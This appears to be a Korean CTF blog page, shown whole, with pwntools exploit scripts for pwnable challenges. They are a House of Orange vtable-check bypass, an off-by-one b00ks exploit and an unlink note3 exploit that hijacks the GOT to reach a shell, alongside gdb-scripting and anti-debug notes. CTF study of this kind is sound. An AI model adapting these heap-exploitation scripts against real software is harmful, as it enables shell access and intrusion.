Vtable check bypass
예제 pwnable.tw notev3
1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465from pwn import *#context.log_level = 'debug'def make_note(size,title): r.sendlineafter('>','1') r.sendlineafter('Size:',str(size)) r.sendafter('Title:',title) def make_note1(size,title,note): r.sendlineafter('>','1') r.sendlineafter('Size:',str(size)) r.sendafter('Title:',title) r.sendafter('Note:',note) def edit_note(idx,data): r.sendlineafter('>','2') r.sendlineafter('Note:',str(idx)) r.sendafter('Data:',data) def list_note(): r.sendlineafter('>','3') #r=process('./challenge',env={'LD_PRELOAD':'alpine-libc-2.24.so'})r=remote('svc.pwnable.xyz',30041)win=0x4008a2script=''''''_IO_str_jumps_off=0x390500#debug = +21640#server = -(libc.symbols['__malloc_hook']+88+0x10) e=ELF('./challenge')libc=ELF('./alpine-libc-2.24.so')make_note(-1,'AAAA')#1edit_note(0,p64(0)+p64(0x31)+p64(0)*5+'\xb1\x0f\x00'+'\x00'*0xff)make_note1(0x1000,'\n','\x00'*0xff)#2make_note(-1,'AAAA'*2)#3list_note()r.recvuntil('A'*8)value=u64(r.recvuntil('\x7f').ljust(8,'\x00'))log.info(hex(value))libc_base=value-(libc.symbols['__malloc_hook']+88+0x10) _IO_list_all=libc_base+libc.symbols['_IO_list_all']-0x10log.info(hex(libc_base))log.info(hex(_IO_list_all))heap_leak=p64(0)+p64(0x31)+'A'*72edit_note(0,heap_leak)list_note()r.recvuntil('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA')heap=u64(r.recv(4).ljust(8,'\x00').replace('\x3a','\x00'))-0x50log.info(hex(heap))payload=p64(0)+p64(0x31)+p64(0)*4fake=p64(0)+p64(0x61)+p64(libc_base)+p64(_IO_list_all)fake+=p64(2)+p64(3)fake+=p64(0)+p64(libc_base+list(libc.search('/bin/sh'))[0])fake+=p64(0)*0x10fake+=p64(0)fake+=p64(0)*2fake+=p64(libc_base+libc.symbols['_IO_file_jumps']+0xc0-0x8)fake=fake.ljust(0xe8,'\x00')fake+=p64(win)*40payload+=fakeedit_note(2,payload)r.sendlineafter('>','1')r.sendlineafter('Size:','1')#gdb.attach(r,script)r.interactive()Colored by Color Scriptercs
https://st4nw.github.io/glibc2.24-orange
12345678910fake = p64(0) + p64(0x61)fake += p64(0) + p64(_IO_list_all-0x10)fake += p64(2) + p64(3)fake += p64(0) + p64(binsh) # _IO_buf_basefake += p64(0) * 0x10fake += p64(0) # modefake += p64(0) * 2fake += p64(_IO_str_jumps-0x8)fake = fake.ljust(0xe8, '\x00')fake += p64(system)cs
Python gdb module 사용법
Python gdb module 사용법
simplecommand.py
import gdb


class SimpleCommand(gdb.Command):
    """A minimal user-defined gdb command that prints a greeting.

    Sourcing this file inside gdb makes the command available as
    ``simple_command``; typing that name at the gdb prompt runs ``invoke``.
    """

    # Name the command is registered under and the text it prints.
    _NAME = "simple_command"
    _GREETING = "Hello from simple_command!"

    def __init__(self):
        # Registering with gdb happens in the base-class constructor; the
        # command is filed under gdb's "data" command category.
        gdb.Command.__init__(self, self._NAME, gdb.COMMAND_DATA)

    def invoke(self, arg, from_tty):
        # gdb calls this with the raw argument string and a flag telling
        # whether the command came from an interactive terminal; both are
        # unused here.
        print(self._GREETING)


# Instantiation is what performs the registration, so the object is created
# (and not kept) at "source" time.
SimpleCommand()
gdb.execute : gdb 명령을 사용할 수 있게 함
ex) gdb.execute('b*(주소값)'), gdb.execute('set pagination off'), gdb.execute('r')
int(gdb.parse_and_eval("$rip")) : rip 값을 반환
xxd "파일이름"
grep 찾을내용
objdump -d 파일
grep xxd값
Asis_2016_books
ASIS_2016_books
off_by_one
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960from pwn import * def create(name_size,content,des_size,content2): sla('>','1') sla(':',str(name_size)) sla(':',content) sla(':',str(des_size)) sla(':',content2) def edit(ids,des): sla('>','3') sla(':',str(ids)) sla(':',des) def delete(ids): sla('>','2') sla(':',str(ids)) def show(): sla('>','4') def change_name(name): sla('>','5') sla(':',name) r=process('./b00ks')e=ELF('./b00ks')libc=e.libc sla = lambda x,y : r.sendlineafter(x,y)ru = lambda x : r.recvuntil(x)sa = lambda x,y : r.sendafter(x,y) sla(':','A'*0x20) create(0x80,'A'*0x7f,0x80,'A'*0x7f)create(0x80,'B'*0x7f,0x80,'B'*0x7f) show()ru('Author: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA')heap=u64(ru('\n').replace('\n','')+'\x00\x00')-0x140log.info(hex(heap)) delete(2) edit(1,'A'*0x50+p64(1)+p64(heap+0x170)+p64(heap+0xb0)+p64(0x80)) change_name('A'*0x20) show()ru('Name: ')libc_leak=u64(ru('\x7f')+'\x00\x00')-0x3c4b78oneshot=libc_leak+0x4526alog.info(hex(libc_leak)) edit(1,'A'*0x50+p64(1)+p64(heap+0x170)+p64(libc_leak+libc.symbols['__free_hook'])+p64(0x80)) edit(1,p64(oneshot))delete(1)r.interactive()Colored by Color Scriptercs
Zctf_2016_note3
ZCTF_2016_note3
간단한 unlink이다
unlink 사용법 : fd(전역변수-0x18)+bk(전역변수-0x10)+prev_size(앞의 사이즈-0x10)+prev_inuse 해제(사이즈-0x1)
1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768from pwn import * def new(size,content): sla('>>','1') sla(')',str(size)) sla(':',content) def edit(idx,content): sla('>>','3') sla(':',str(idx)) sla(':',content) from pwn import * def new(size,content): sla('>>','1') sla(')',str(size)) sla(':',content) def edit(idx,content): sla('>>','3') sla(':',str(idx)) sla(':',content) def delete(idx): sla('>>','4') sla(':',str(idx)) r=process('./note3')e=ELF('./note3')libc=e.libc sla = lambda x,y : r.sendlineafter(x,y)ru = lambda x : r.recvuntil(x) for i in range(8): new(0x80,'A'*8) fuck=-9223372036854775808 edit(3,'A')payload=p64(0)+p64(0x81)payload+=p64(0x6020c0-0x18+0x20)+p64(0x6020c0-0x10+0x20)payload+='\x00'*0x60payload+=p64(0x80)+p64(0x90)edit(fuck,payload) delete(4) payload2=p64(e.got['free'])*2+p64(e.got['atoi'])*2 edit(3,payload2)edit(1,p32(e.plt['puts'])+'\x00\x00') r.interactive()delete(2) r.recv(1) leak = u64(ru('\x7f').ljust(8,'\x00'))-libc.symbols['atoi']log.info(hex(leak)) edit(3,p64(leak+libc.symbols['system']).replace('\x00',''))sla('>>','/bin/sh') r.interactive()Colored by Color Scriptercs
Anti Debug
Anti-debug 1. IsDebuggerPresent 함수 가장 기본적인 Anti-debugger windows.h 헤더 파일에 있다. 2. NtGlobalFlag PEB에서 0x68 위치에 존재하는 값 디버깅 중일 경우 이 값이 0x70으로 설정 3. CheckRemoteDebuggerPresent 4. FindWindow ex) FindWindow(NULL,L"OLLYDBG"); 5. NtQueryObject 디버깅 중이면 DebugObject라는 객체를 생성 이...